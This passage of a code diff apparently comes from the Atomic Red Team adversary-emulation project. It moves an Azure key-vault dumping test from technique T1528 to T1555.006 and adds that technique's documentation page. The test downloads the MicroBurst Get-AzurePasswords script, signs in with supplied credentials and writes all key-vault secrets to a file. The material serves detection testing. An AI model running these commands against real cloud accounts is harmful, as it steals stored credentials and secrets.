-          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
-          Connect-AzureRmAccount -Credential $Credential
-          Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
-          cat #{output_file}
-        cleanup_command: 'remove-item #{output_file} -force -erroraction silentlycontinue
-
-          '
-        name: powershell
-        elevation_required: true
+    atomic_tests: []
  T1552.006:
    technique:
      type: attack-pattern
@@ -49899,7 +49829,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -49935,7 +49865,77 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
-    atomic_tests: []
+      identifier: T1555.006
+    atomic_tests:
+    - name: Azure - Dump All Azure Key Vaults with Microburst
+      auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
+      description: |-
+        Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
+        See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: string
+          default:
+        password:
+          description: Azure AD password
+          type: string
+          default: T1082Az
+        output_file:
+          description: File to dump results to
+          type: string
+          default: "$env:temp\\T1528Test1.txt"
+        subscription_id:
+          description: Azure subscription id to search
+          type: string
+          default:
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
+
+          '
+        prereq_command: 'if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+      - description: 'The Azure RM module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name AzureRM -Force -allowclobber
+
+          '
+      - description: 'The Azure module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Azure -Force -allowclobber
+
+          '
+      executor:
+        command: |
+          import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+          $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+          Connect-AzureRmAccount -Credential $Credential
+          Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
+          cat #{output_file}
+        cleanup_command: 'remove-item #{output_file} -force -erroraction silentlycontinue
+
+          '
+        name: powershell
+        elevation_required: true
  T1003.008:
    technique:
      type: attack-pattern
@@ -48048,7 +48048,6 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -49100,7 +49099,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -49136,6 +49135,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -100182,77 +100182,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
-    atomic_tests:
-    - name: Azure - Dump All Azure Key Vaults with Microburst
-      auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
-      description: |-
-        Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
-        See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        username:
-          description: Azure AD username
-          type: string
-          default:
-        password:
-          description: Azure AD password
-          type: string
-          default: T1082Az
-        output_file:
-          description: File to dump results to
-          type: string
-          default: "$env:temp\\T1528Test1.txt"
-        subscription_id:
-          description: Azure subscription id to search
-          type: string
-          default:
-      dependency_executor_name: powershell
-      dependencies:
-      - description: 'The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
-
-          '
-        prereq_command: 'if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit
-          0} else {exit 1}
-
-          '
-        get_prereq_command: |
-          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-          invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
-      - description: 'The Azure RM module must be installed.
-
-          '
-        prereq_command: 'try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-
-          '
-        get_prereq_command: 'Install-Module -Name AzureRM -Force -allowclobber
-
-          '
-      - description: 'The Azure module must be installed.
-
-          '
-        prereq_command: 'try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-
-          '
-        get_prereq_command: 'Install-Module -Name Azure -Force -allowclobber
-
-          '
-      executor:
-        command: |
-          import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
-          $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
-          Connect-AzureRmAccount -Credential $Credential
-          Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
-          cat #{output_file}
-        cleanup_command: 'remove-item #{output_file} -force -erroraction silentlycontinue
-
-          '
-        name: powershell
-        elevation_required: true
+    atomic_tests: []
  T1552.006:
    technique:
      type: attack-pattern
@@ -101638,7 +101568,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -101674,7 +101604,77 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
-    atomic_tests: []
+      identifier: T1555.006
+    atomic_tests:
+    - name: Azure - Dump All Azure Key Vaults with Microburst
+      auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
+      description: |-
+        Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
+        See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: string
+          default:
+        password:
+          description: Azure AD password
+          type: string
+          default: T1082Az
+        output_file:
+          description: File to dump results to
+          type: string
+          default: "$env:temp\\T1528Test1.txt"
+        subscription_id:
+          description: Azure subscription id to search
+          type: string
+          default:
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
+
+          '
+        prereq_command: 'if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+      - description: 'The Azure RM module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name AzureRM -Force -allowclobber
+
+          '
+      - description: 'The Azure module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Azure -Force -allowclobber
+
+          '
+      executor:
+        command: |
+          import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+          $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+          Connect-AzureRmAccount -Credential $Credential
+          Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
+          cat #{output_file}
+        cleanup_command: 'remove-item #{output_file} -force -erroraction silentlycontinue
+
+          '
+        name: powershell
+        elevation_required: true
  T1003.008:
    technique:
      type: attack-pattern
@@ -57710,7 +57710,6 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -58826,7 +58825,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -58862,6 +58861,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -53452,7 +53452,6 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -54563,7 +54562,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -54599,6 +54598,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -47874,7 +47874,6 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -48926,7 +48925,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -48962,6 +48961,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -47453,7 +47453,6 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -48505,7 +48504,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -48541,6 +48540,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -82072,7 +82072,6 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -83336,7 +83335,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -83372,6 +83371,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -0,0 +1,96 @@
+# T1555.006 - Credentials from Password Stores: Cloud Secrets Management Stores
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1555/006)
+<blockquote>
+
+Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.  
+
+Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.  
+
+If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004) or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)
+
+**Note:** this technique is distinct from [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.
+
+</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Azure - Dump All Azure Key Vaults with Microburst](#atomic-test-1---azure---dump-all-azure-key-vaults-with-microburst)
+
+
+<br/>
+
+## Atomic Test #1 - Azure - Dump All Azure Key Vaults with Microburst
+Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
+See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | string | |
+| password | Azure AD password | string | T1082Az|
+| output_file | File to dump results to | string | $env:temp&#92;T1528Test1.txt|
+| subscription_id | Azure subscription id to search | string | |
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+Connect-AzureRmAccount -Credential $Credential
+Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```powershell
+remove-item #{output_file} -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
+##### Check Prereq Commands:
+```powershell
+if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+```
+##### Description: The Azure RM module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureRM -Force -allowclobber
+```
+##### Description: The Azure module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Azure -Force -allowclobber
+```
+
+
+
+
+<br/>